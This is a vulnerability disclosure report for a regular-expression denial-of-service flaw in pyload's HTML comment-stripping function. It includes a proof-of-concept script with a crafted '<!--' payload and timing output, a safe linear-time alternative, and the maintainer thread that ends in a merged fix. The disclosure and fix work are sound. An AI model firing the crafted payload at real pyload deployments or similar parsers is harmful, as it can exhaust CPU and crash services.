Inefficient Regular Expression Complexity in pyload/pyload

Valid

Reported on

Sep 20th 2021


✍️ Description

The pyload package is vulnerable to ReDoS (regular expression denial of service). An attacker who can supply crafted HTML comments as input to the comments function of utils/web/purge.py can make the application consume an excessive amount of CPU. The pinned lines below show the vulnerable regex.

🕵️‍♂️ Proof of Concept

Reproducer where we’ve copied the relevant code:

https://github.com/pyload/pyload/blob/127beb0ea3b9c9c23991cbde7d83dc9d892d2d5c/src/pyload/core/utils/web/purge.py#L7 https://github.com/pyload/pyload/blob/127beb0ea3b9c9c23991cbde7d83dc9d892d2d5c/src/pyload/core/utils/web/purge.py#L12-L14

Put the below in a poc.py file and run with python

import time
import re

# Pattern copied from pyload's utils/web/purge.py. With re.S the lazy ".*?"
# scans to the end of the input for every unclosed "<!--", so a string made of
# repeated "<!--" with no "-->" costs O(n^2) in the backtracking engine.
_RE_COMMENTS = re.compile(r"<!--.*?-->", flags=re.S)


def comments(value):
    """Removes HTML comments from a text string."""
    return _RE_COMMENTS.sub("", value).strip()


for i in range(1, 50000):
    start_time = time.perf_counter()
    # i*10000 openers and a trailing "-" that never completes a "-->" closer
    payload = "" + "<!--" * (i * 10000) + "-"
    comments(payload)
    # perf_counter() returns seconds; the label below prints that value as "ms"
    stop_time = time.perf_counter() - start_time
    print("Payload.length: " + str(len(payload)) + ": " + str(stop_time) + " ms")

Check the Output:

Payload.length: 40001: 2.9121267 ms
Payload.length: 80001: 10.2797351 ms
Payload.length: 120001: 27.080219800000002 ms
Payload.length: 160001: 45.3576031 ms
Payload.length: 200001: 66.31825060000001 ms

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.
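The quadratic behaviour above comes from the regex engine restarting the lazy scan at every unclosed "<!--". The following added example (not pyload's code and not the fix that was merged) puts the original pattern beside a linear-time replacement that pairs each "<!--" with the next "-->" in a single str.find pass, keeps unclosed comments untouched exactly as the lazy regex does, and times both on the report's pathological payload; the function and helper names are assumptions for illustration.

```python
import re
import time

# Vulnerable pattern as shipped in pyload's utils/web/purge.py before the fix.
_RE_COMMENTS = re.compile(r"<!--.*?-->", flags=re.S)


def comments_vulnerable(value):
    """Original behaviour: backtracking regex, quadratic on unclosed '<!--' runs."""
    return _RE_COMMENTS.sub("", value).strip()


def comments_safe(value):
    """Same result as comments_vulnerable, computed in one left-to-right pass.

    Each '<!--' is paired with the next '-->' via str.find; an unclosed
    comment leaves the remainder in place (as the lazy regex does), and the
    scan never restarts from an earlier position, so cost is O(len(value)).
    """
    out = []
    pos = 0
    while True:
        start = value.find("<!--", pos)
        if start == -1:
            out.append(value[pos:])
            break
        end = value.find("-->", start + 4)
        if end == -1:  # unclosed comment: keep the rest of the input untouched
            out.append(value[pos:])
            break
        out.append(value[pos:start])
        pos = end + 3
    return "".join(out).strip()


def pathological_payload(repeats):
    """Constructed input in the shape of the report's PoC: openers, no closer."""
    return "<!--" * repeats + "-"


def time_call(func, payload):
    """Wall-clock seconds for one call (perf_counter returns seconds, not ms)."""
    start = time.perf_counter()
    func(payload)
    return time.perf_counter() - start


if __name__ == "__main__":
    for repeats in (2500, 5000, 10000):
        p = pathological_payload(repeats)
        print(f"{len(p):>6} chars: vulnerable {time_call(comments_vulnerable, p):.3f}s"
              f"  safe {time_call(comments_safe, p):.4f}s")
```

Doubling the payload roughly quadruples the vulnerable timing while the safe variant stays flat, which is the growth curve to look for when triaging a suspected ReDoS.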

Occurrences

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
Z-Old
a year ago

Admin


Hey ready-research, I've emailed the maintainers for you.

We have contacted a member of the pyload team and are waiting to hear back a year ago
pyload/pyload maintainer
a year ago

Hello, I got your email, How do you suggest to fix this issue?

ready-research submitted a
a year ago
ready-research
a year ago

Researcher


@maintainer Submitted a patch.

Please validate this issue using Mark as valid and also please confirm the fix once it got merged.

pyload/pyload maintainer validated this vulnerability a year ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
pyload/pyload maintainer
a year ago

@ready-research Where is the patch?

ready-research
a year ago

Researcher


You can select my branch fix-redos.

@admin Can you please guide the maintainer?

Jamie Slome
a year ago

Admin


@maintainer - please click the confirm fix button above, and follow the steps in the modal form.

When selecting who fixed the vulnerability, feel free to elect @ready-research.

ready-research submitted a
a year ago
pyload/pyload maintainer confirmed that a fix has been merged on 0ff11b a year ago
ready-research has been awarded the fix bounty
purge.py#L7 has been validated